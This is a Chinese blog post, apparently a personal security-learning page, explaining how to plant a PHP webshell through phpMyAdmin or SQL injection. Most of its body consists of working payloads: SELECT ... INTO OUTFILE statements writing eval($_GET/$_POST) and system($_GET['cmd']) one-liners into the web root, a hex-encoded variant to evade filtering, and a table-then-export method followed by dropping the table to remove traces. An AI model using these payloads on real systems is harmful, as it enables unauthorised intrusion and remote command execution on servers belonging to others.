<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Webshell,">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2">






<meta name="description" content="Webshell（一）通过phmyadmin导出一句话 ## 导语&amp;gt; 今天无意中看见了一篇有关进入phpmyadmin中执行SQL语句写马的文章，自己搭好环境练习了一下">
<meta name="keywords" content="Webshell">
<meta property="og:type" content="article">
<meta property="og:title" content="Webshell（一）通过phmyadmin导出一句话">
<meta property="og:url" content="http://blbana.cc/2016/07/28/webshell-ef-bc-88-e4-b8-80-ef-bc-89-e9-80-9a-e8-bf-87phmyadmin-e5-af-bc-e5-87-ba-e4-b8-80-e5-8f-a5-e8-af-9d/index.html">
<meta property="og:site_name" content="BlBana&#39;s Blog 一只Web汪 ~">
<meta property="og:description" content="Webshell（一）通过phmyadmin导出一句话 ## 导语&amp;gt; 今天无意中看见了一篇有关进入phpmyadmin中执行SQL语句写马的文章，自己搭好环境练习了一下">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://123.206.79.232/img/Webshell.jpg">
<meta property="og:image" content="http://123.206.79.232/img/webshell2.jpg">
<meta property="og:updated_time" content="2018-11-13T15:13:52.503Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Webshell（一）通过phmyadmin导出一句话">
<meta name="twitter:description" content="Webshell（一）通过phmyadmin导出一句话 ## 导语&amp;gt; 今天无意中看见了一篇有关进入phpmyadmin中执行SQL语句写马的文章，自己搭好环境练习了一下">
<meta name="twitter:image" content="http://123.206.79.232/img/Webshell.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://blbana.cc/2016/07/28/webshell-ef-bc-88-e4-b8-80-ef-bc-89-e9-80-9a-e8-bf-87phmyadmin-e5-af-bc-e5-87-ba-e4-b8-80-e5-8f-a5-e8-af-9d/">





  <title>Webshell（一）通过phmyadmin导出一句话 | BlBana's Blog 一只Web汪 ~</title>
  














</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">BlBana's Blog 一只Web汪 ~</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">A interesting Web Dog~</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://blbana.cc/2016/07/28/webshell-ef-bc-88-e4-b8-80-ef-bc-89-e9-80-9a-e8-bf-87phmyadmin-e5-af-bc-e5-87-ba-e4-b8-80-e5-8f-a5-e8-af-9d/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="BlBana">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="BlBana's Blog 一只Web汪 ~">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Webshell（一）通过phmyadmin导出一句话</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2016-07-28T10:21:42+08:00">
                2016-07-28
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/Webshell/" itemprop="url" rel="index">
                    <span itemprop="name">Webshell</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <header class="entry-header">

<h1 id="Webshell（一）通过phmyadmin导出一句话"><a href="#Webshell（一）通过phmyadmin导出一句话" class="headerlink" title="Webshell（一）通过phmyadmin导出一句话"></a><a href="http://blog.blbana.cc/blog/Webshell%25EF%25BC%2588%25E4%25B8%2580%25EF%25BC%2589%25E9%2580%259A%25E8%25BF%2587phpmyadmin%25E5%25AF%25BC%25E5%2587%25BA%25E4%25B8%2580%25E5%258F%25A5%25E8%25AF%259D.html" target="_blank" rel="noopener">Webshell（一）通过phmyadmin导出一句话</a></h1><p></p></header><p></p>
<div class="entry-content"><br><br>## 导语<br><br>&gt; 今天无意中看见了一篇有关进入phpmyadmin中执行SQL语句写马的文章，自己搭好环境练习了一下<br><br><a id="more"></a><br>### 正文<br><br>我们最常用的方法就是利用<strong>SQL注入</strong>构造出能够写shell的语句，通常都是这一句：<br><br>    SELECT ‘<span class="php"><span class="hljs-preprocessor">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">‘passwd’</span>]);<span class="hljs-preprocessor">?&gt;</span></span>‘ INTO OUTFILE ‘C：/wamp/www/1.hack’<code>&lt;/pre&gt;
    执行完语句之后，我们发现shell已经被写在了对应目录写的文件里

    ![image](http://123.206.79.232/img/Webshell1.jpg)

    有时候我们发现自己的shell并没有编写成功，这有可能是我们的shell被过滤掉了，我们可以考虑将shell转成十六进制的编码，再次尝试写马
    &lt;pre&gt;</code><span class="hljs-operator"><span class="hljs-keyword">SELECT</span> <span class="hljs-number">0x3c3f70687020406576616c28245f504f53545b2768656c6c275d293b3f3e</span> <span class="hljs-keyword">INTO</span> <span class="hljs-keyword">OUTFILE</span> <span class="hljs-string">‘C:/wamp/www/1.hack’</span></span><code>&lt;/pre&gt;
    这时我们可能绕过了过滤成功写马

    可能进行了十六进制的编码我们依然无法成功写马，今天我又看见了下面的几种通过phpmyadmin写马的方式，但让前提是我们要进入 **数据库**的**phpmyadmin**

    #### 1.我们可以现在数据库的**mysql数据库**中建立一个表shell,表中有字段shell1</code>CREATE TABLE shell(shell1 TEXT NOT NULL);<code>建好后给字段shell1输入values值 ，也就是shell</code>INSERT INTO shell(shell1) VALUES(‘&lt;?php @eval($_POST[pass])?&gt;’);<code>写好这个字段以后，通过以下SQL语句将shell导出数据库
    &lt;pre&gt;</code><span class="hljs-operator"><span class="hljs-keyword">SELECT</span> she111 <span class="hljs-keyword">from</span> shell <span class="hljs-keyword">INTO</span> <span class="hljs-keyword">OUTFILE</span> <span class="hljs-string">‘c:/wamp/www/1.hack’</span>;</span><code>&lt;/pre&gt;
    执行完以上操纵以后，记得删除表哟 **哇哈哈哈哈**</code>DROP TABLE IF EXISTS ‘shell’;<code>#### 2.我们还可以写入PHP函数**system()**来执行系统命令

    &lt;pre&gt;</code>SELECT ‘<span class="php"><span class="hljs-preprocessor">&lt;?PHP</span> <span class="hljs-keyword">echo</span> <span class="hljs-string">‘&lt;pre&gt;’</span>;system(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">‘cmd’</span>])<span class="hljs-preprocessor">?&gt;</span></span>;echo ‘<span class="hljs-tag">&lt;/<span class="hljs-title">pre</span>&gt;</span>‘’;<br><br>&gt; 标签<br>&gt;<br>&gt; <pre></pre><br>&gt;<br>&gt; 目的是让返回的结果，保持原有的换行等操作，方便我们的查看<br><img src="http://123.206.79.232/img/Webshell.jpg" alt="image"><br><br>之后我们就可以通过shell执行系统指令了，如下图<br><br><img src="http://123.206.79.232/img/webshell2.jpg" alt="image"><br><br>这次先总结这么多的写shell的方法，以后发现新的了还会继续~~<br><br></div>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Webshell/" rel="tag"># Webshell</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/07/28/ubuntu-e4-b8-8bftp-e6-9c-8d-e5-8a-a1-e5-99-a8-e7-9a-84-e9-85-8d-e7-bd-ae/" rel="next" title="Ubuntu下FTP服务器的配置">
                <i class="fa fa-chevron-left"></i> Ubuntu下FTP服务器的配置
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/07/28/webshell-e6-8f-90-e6-9d-83-ef-bc-88-e4-b8-80-ef-bc-89/" rel="prev" title="Webshell提权（一）">
                Webshell提权（一） <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="BlBana">
          <p class="site-author-name" itemprop="name">BlBana</p>
           
              <p class="site-description motion-element" itemprop="description">Web安全 | 代码审计 | PHP | Python ...</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">28</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              
                <span class="site-state-item-count">22</span>
                <span class="site-state-item-name">分类</span>
              
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              
                <span class="site-state-item-count">36</span>
                <span class="site-state-item-name">标签</span>
              
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Webshell（一）通过phmyadmin导出一句话"><span class="nav-number">1.</span> <span class="nav-text">Webshell（一）通过phmyadmin导出一句话</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">BlBana</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  





  

  

  

  

  

  

</body>
</html>
